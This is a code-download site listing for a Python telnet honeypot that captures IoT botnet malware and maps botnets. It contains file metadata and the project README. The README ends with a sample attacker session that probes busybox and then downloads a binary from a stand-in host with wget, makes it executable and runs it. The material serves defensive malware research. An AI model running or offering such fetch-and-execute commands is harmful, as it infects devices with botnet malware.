telnet-iot-honeypot-master
所属分类:远程控制/远程桌面
开发工具:Python
文件大小:1371KB
下载次数:1
上传日期:2020-10-10 06:07:58
上 传 者:
asmijee
说明: Python telnet honeypot for catching botnet binaries'
This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.
文件列表:
Dockerfile (195, 2020-07-22)
INSTALL.md (3686, 2020-07-22)
backend.py (1950, 2020-07-22)
backend (0, 2020-07-22)
backend\__init__.py (0, 2020-07-22)
backend\additionalinfo.py (2836, 2020-07-22)
backend\authcontroller.py (1969, 2020-07-22)
backend\backend.py (7436, 2020-07-22)
backend\clientcontroller.py (13057, 2020-07-22)
backend\cuckoo.py (3086, 2020-07-22)
backend\db.py (16947, 2020-07-22)
backend\ipdb (0, 2020-07-22)
backend\ipdb\__init__.py (0, 2020-07-22)
backend\ipdb\ipdb.py (2113, 2020-07-22)
backend\virustotal.py (2259, 2020-07-22)
backend\virustotal_fill_db.py (828, 2020-07-22)
backend\webcontroller.py (7682, 2020-07-22)
config.dist.yaml (2509, 2020-07-22)
create_config.sh (293, 2020-07-22)
create_docker.sh (2451, 2020-07-22)
honeypot.py (2072, 2020-07-22)
honeypot (0, 2020-07-22)
honeypot\__init__.py (0, 2020-07-22)
honeypot\__main__.py (206, 2020-07-22)
honeypot\client.py (1717, 2020-07-22)
honeypot\sampledb_client.py (3092, 2020-07-22)
honeypot\session.py (1969, 2020-07-22)
honeypot\shell (0, 2020-07-22)
honeypot\shell\__init__.py (0, 2020-07-22)
honeypot\shell\commands (0, 2020-07-22)
honeypot\shell\commands\__init__.py (0, 2020-07-22)
honeypot\shell\commands\base.py (5326, 2020-07-22)
honeypot\shell\commands\binary.py (2521, 2020-07-22)
honeypot\shell\commands\cmd_util.py (227, 2020-07-22)
honeypot\shell\commands\shell.py (675, 2020-07-22)
honeypot\shell\commands\shellcode.py (1641, 2020-07-22)
... ...
# Telnet IoT honeypot
'Python telnet honeypot for catching botnet binaries'
This project implements a python telnet server trying to act
as a honeypot for IoT Malware which spreads over horribly
insecure default passwords on telnet servers on the internet.
The honeypot works by emulating a shell enviroment, just like
cowrie (https://github.com/micheloosterhof/cowrie).
The aim of this project is primarily to automatically analyse
Botnet connections and "map" Botnets by linking diffrent
connections and even Networks together.
## Architecture
The application has a client/server architecture,
with a client (the actual honeypot) accepting telnet connections
and a server which receives information about connections and
does the analysis.
The backend server exposes a HTTP interface which is used
to access to frontend as well as by the clients to push new
Connection information to the backend.
## Automatic analysis
The Backend uses 2 diffrent mechanisms to automatically link
connections:
### Networks
Networks are discovered Botnets. A network is the set of all linked
connections, urls and samples. Urls and samples
are linked when they are used in a connection. Two connections are linked
when both connections are recieved by the same honeypot client
(mutliple clients are supported!) and use the same credentials in a short
period of time (defautl 2 minutes) or come from the same IP address.
### Malware
Multiple networks are identified to use the same type of malware
if the text entered during sessions of the networks aro mostly the
same. This comparison is done using sort of "hash"-function which
basically translates a session (or connection) into a sequence
of words and then maps each word to a single byte so this resulting
sequence of bytes can be easily searched.
# Running
The application has a config file named config.py.
Samples are included for local and client/server deployments.
## Configuration
The backend requires a SQL-database (default sqlite) which is initialized
at first run. Before the first run you should generate a admin account
which is used to generate more users. The admin account can also directly
used by a client to post connections. When more than one honeypots shall be
connected, creating multiple users is recommended.
bash create_config.sh
Both client and backend will read the files `config.yaml` and `config.dist.yaml`
to read configuration parameters. The `config.dist.yaml` file includes
default values for all but admin user credentials and these parameters
are overwirtten by entries in the `config.yaml` file.
## Running the Server
python backend.py
## Running the Client
This project contains an own honeypot, however because of the client-server architecture,
other honeypot can be used as well.
### Using the built-in honeypot
python honeypot.py
The client cannot be started without the server running. To use a diffrent configuration
for the client you can use the `-c` switch like this:
python honeypot.py -c myconfig.yaml
If you only want to check the honeypot functionality,
you can start the client in interactive mode:
python honeypot shell
### Using cowrie
I wrote an output plugin for cowrie, which has much more features than the built in honeypot.
If you want to use cowrie instead, checkout my fork which includes the output module here:
https://github.com/Phype/cowrie .
## Opening the frontend
After the server is started, open `http://127.0.0.1/` in your favorite browser.
## Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
## Images
近期下载者:
相关文件:
收藏者: